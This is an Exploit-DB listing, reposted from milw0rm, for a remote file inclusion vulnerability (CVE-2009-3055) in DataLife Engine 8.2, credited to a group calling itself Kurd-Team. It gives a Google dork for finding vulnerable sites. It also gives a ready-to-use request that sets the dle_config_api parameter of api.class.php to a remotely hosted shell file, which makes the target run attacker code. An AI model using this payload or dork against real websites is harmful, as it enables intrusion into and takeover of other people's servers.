DataLife Engine 8.2 - dle_config_api Remote File Inclusion

EDB-ID:

9572

CVE:

2009-3055

EDB Verified:

Author:

Kurd-Team

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-09-01

Vulnerable App:

======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
 
<<!>> Found by  :  kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team
<<!>> site   : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script   :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::
 
 >>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
 
 
=======================================================
 
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team

# milw0rm.com [2009-09-01]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services